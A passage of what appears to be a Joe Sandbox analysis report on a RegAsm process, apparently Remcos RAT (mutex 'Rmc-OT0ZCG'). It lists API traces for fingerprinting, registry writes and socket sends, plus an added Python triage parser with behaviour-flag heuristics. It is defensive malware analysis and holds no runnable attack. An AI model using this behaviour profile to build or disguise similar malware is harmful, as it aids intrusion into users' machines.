                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 782494840-2070987746
                                          • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                          • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                          • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                          • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                          • __freea.LIBCMT ref: 10008A08
                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                          • __freea.LIBCMT ref: 10008A11
                                          • __freea.LIBCMT ref: 10008A36
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountEventTick
                                          • String ID: !D@$NG
                                          • API String ID: 180926312-2721294649
                                          • Opcode ID: e4d6f1142550c4a5ff115462e5a39bbe35dfcbd7a27ecb26af4874e68cbb448e
                                          • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                          • Opcode Fuzzy Hash: e4d6f1142550c4a5ff115462e5a39bbe35dfcbd7a27ecb26af4874e68cbb448e
                                          • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                          APIs
                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$EventLocalThreadTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 2532271599-1507639952
                                          • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                          • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                          • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                          • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                          • RegCloseKey.KERNEL32(?), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc
                                          • API String ID: 1818849710-4028850238
                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
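                                          The per-function listings above (the dynamic getaddrinfo/ws2_32 resolution, the connect/TLS status block, the CurrentVersion/IsWow64Process fingerprinting block and the pth_unenc registry write) are easier to triage when read by a script than by eye. The following is an added example, not Joe Sandbox code or part of this report: a parser for the "APIs" / "String ID" block format, with SAMPLE copied from the listings on this page (only the lines the parser consumes). The behaviour flags it derives are this editor's own heuristics, not Joe Sandbox signatures.

```python
"""Machine-read Joe Sandbox per-function analysis blocks.

Added example for this report page; it is not Joe Sandbox code. SAMPLE is
copied from the 'APIs' listings on this page. The behaviour flags are this
editor's own triage heuristics, not Joe Sandbox signatures."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# One API line, top-level or nested under "Part of subcall function". Examples from the report:
#   • connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
#   • WSAGetLastError.WS2_32 ref: 00404A21
#   • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\s*(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
# Key/value metadata line such as "• String ID: pth_unenc" (the value may be empty).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][\w ]*?):\s*(?P<val>.*)$")

HKCU = "80000001"  # HKEY_CURRENT_USER as it appears in the report's argument lists


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: str
    via_subcall: Optional[str]  # callee address when the call is nested, else None


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    @property
    def apis(self) -> set[str]:
        return {c.api for c in self.calls}

    @property
    def strings(self) -> list[str]:
        # Joe Sandbox joins the referenced strings with '$'.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def entry_ref(self) -> Optional[str]:
        # Lowest direct (non-subcall) reference: a usable label for the function.
        direct = [c.ref for c in self.calls if c.via_subcall is None]
        return min(direct) if direct else None


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Each 'APIs' heading starts a new function block; other headings are ignored."""
    blocks: list[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            current.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"].strip()
    return blocks


def behaviour_flags(fn: FunctionBlock) -> set[str]:
    """Editor's heuristics over API names, first arguments and referenced strings."""
    flags: set[str] = set()
    apis, strings = fn.apis, fn.strings
    if "GetProcAddress" in apis:
        flags.add("dynamic-import")  # imports resolved at run time (the getaddrinfo block)
    if any(c.api == "connect" and c.module == "WS2_32" for c in fn.calls):
        flags.add("network-connect")
    if any(s.startswith("TLS") for s in strings):
        flags.add("tls-status-strings")  # C2 channel status messages
    opens_hkcu = any(c.api.startswith(("RegCreateKey", "RegOpenKey")) and c.args[:1] == (HKCU,)
                     for c in fn.calls)
    if opens_hkcu and any(c.api.startswith("RegSetValueEx") for c in fn.calls):
        flags.add("registry-write-hkcu")
    if "IsWow64Process" in apis and any("CurrentVersion" in s for s in strings):
        flags.add("os-fingerprint")
    return flags


def summarize(text: str) -> list[dict]:
    return [{"entry": b.entry_ref, "flags": sorted(behaviour_flags(b)), "strings": b.strings}
            for b in parse_blocks(text)]


# Copied from the function listings on this page (trimmed to the lines the parser reads).
SAMPLE = r"""APIs
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
• FreeLibrary.KERNEL32(00000000), ref: 00414ECA
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
APIs
• connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
• WSAGetLastError.WS2_32 ref: 00404A21
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
• StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
• RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
• RegCloseKey.KERNEL32(?), ref: 004137EC
• String ID: pth_unenc
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["entry"], row["flags"], row["strings"])
```

                                          The parser keys only on the "APIs" heading and the bullet lines, so the whole exported report text can be fed in unchanged; headings such as "Memory Dump Source" and "Similarity" are skipped. The registry flag deliberately requires both an HKCU open/create (first argument 80000001) and a RegSetValueEx in the same block, so the fingerprinting block that only reads CurrentVersion is classified as os-fingerprint rather than as a write.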
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 3360349984-0
                                          • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                          • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                          APIs
                                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModuleProtectVirtual
                                          • String ID:
                                          • API String ID: 2905821283-0
                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 3919263394-0
                                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/jpeg
                                          • API String ID: 1291196975-3785015651
                                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/png
                                          • API String ID: 1291196975-2966254431
                                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID: Rmc-OT0ZCG
                                          • API String ID: 1925916568-2453204340
                                          • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                          • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                          • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                          • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModuleProtectVirtual
                                          • String ID:
                                          • API String ID: 2905821283-0
                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                          APIs
                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventObjectSingleWaitsend
                                          • String ID:
                                          • API String ID: 3963590051-0
                                          • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                          • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                          • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                          • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                          APIs
                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$HandleModule
                                          • String ID:
                                          • API String ID: 3519776433-0
